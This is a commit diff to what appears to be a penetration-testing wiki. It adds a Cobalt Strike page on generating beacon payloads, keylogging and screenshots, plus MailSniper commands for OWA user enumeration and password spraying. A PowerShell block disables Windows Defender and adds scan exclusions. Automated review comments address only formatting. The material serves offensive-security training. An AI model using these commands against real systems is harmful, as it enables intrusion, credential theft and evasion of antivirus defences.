GitBook: [#3365] No subject

CPol 2022-08-12 22:50:15 +00:00 committed by gitbook-bot
parent cbff1b34ea
commit b60731d690
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 69 additions and 6 deletions

@ -639,6 +639,7 @@
* [Empire](backdoors/empire.md)
* [Salseo](backdoors/salseo.md)
* [ICMPsh](backdoors/icmpsh.md)
* [Cobalt Strike](c2/cobalt-strike.md)
## ✍ TODO
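
Review bot: The new `* [Cobalt Strike](c2/cobalt-strike.md)` entry is listed in the same run as Empire, Salseo and ICMPsh, but it is the only one that does not live under `backdoors/`. Either move the page next to its siblings or give the `c2/` directory its own group in the summary, so the navigation tree matches the file layout. A blank line between the last list item and `## ✍ TODO` would also keep the heading from being read as part of the list.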

42
c2/cobalt-strike.md Normal file
@ -0,0 +1,42 @@
# Cobalt Strike
### Listeners
Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
### Generate & Host payloads
#### Generate payloads in files
Attacks -> Packages -> 
* **`HTMLApplication`** for HTA files
* **`MS Office Macro`** for an office document with a macro
* **`Windows Executable`** for a .exe, .dll orr service .exe
* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
#### Generate & Host payloads
A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
#### Host Payloads
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
### Beacon Options
```bash
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
screenwatch # Take periodic screenshots of desktop
## Go to View -> Screenshots to see them
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
```
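
Review bot: The heading `#### Generate & Host payloads` repeats the text of its own parent `### Generate & Host payloads`, which produces duplicate anchors and an ambiguous outline; name the subsection after what it covers (the line under it is about Scripted Web Delivery). In the same paragraph the opening backtick is misplaced in "A`ttacks -> Web Drive-by", so the inline code span starts after the first letter. Smaller fixes in this file: "orr service .exe", "If you already has the file", "web sever", and the dangling arrow at the end of "Attacks -> Packages ->". The Beacon Options block is fenced as `bash`, but its lines are Beacon console commands rather than shell commands, so a neutral or untagged fence would avoid misleading highlighting.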

@ -91,6 +91,28 @@ msf> use auxiliary/gather/kerberos_enumusers
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
```
{% hint style="warning" %}
You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names).
However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) **** to generate potential valid usernames.
{% endhint %}
#### **OWA (Outlook Web Access) Server**
If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper):
```bash
ipmo C:\Tools\MailSniper\MailSniper.ps1
# Get info about the domain
Invoke-DomainHarvestOWA -ExchHostname [ip]
# Enumerate valid users from a list of potential usernames
Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt
# Password spraying
Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021
# Get addresses list from the compromised mail
Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
```
### Knowing one or several usernames
Ok, so you know you have already a valid username but no passwords... Then try:
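
Review bot: The MailSniper block is fenced as `bash`, but every line in it (`ipmo`, `Invoke-DomainHarvestOWA`, `Get-GlobalAddressList`) is PowerShell, so the fence should be tagged `powershell`. The block also mixes scopes: `Invoke-PasswordSprayOWA` and `Get-GlobalAddressList` need valid usernames or working credentials, which fits the following `### Knowing one or several usernames` section better than this enumeration subsection. In the hint above it, the stray `****` after the namemash.py link renders as literal asterisks and "you could used the script" should read "you could use the script". The literal `Summer2021` sits next to bracketed placeholders like `[ip]` and `[domain]`; a `[password]` placeholder would be consistent.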

@ -176,15 +176,13 @@ Get-NetConnectionProfile |
}
```
## Disable Defender
## Antivirus
```bash
#Check status
Get-MpComputerStatus
#Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
#Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
```
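
Review bot: The section heading is broadened to `## Antivirus`, yet every command under it (`Get-MpComputerStatus`, `Set-MpPreference`, `Add-MpPreference`, the `Windows Defender` policy key) is specific to Defender, so either keep a Defender-specific heading or add a `### Windows Defender` subheading beneath the new one. The `Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"` line hard-codes what looks like a leftover personal path; use a placeholder and say in the `#Set exclusion path` comment what the reader is expected to substitute. The fence is tagged `bash` although the content is PowerShell.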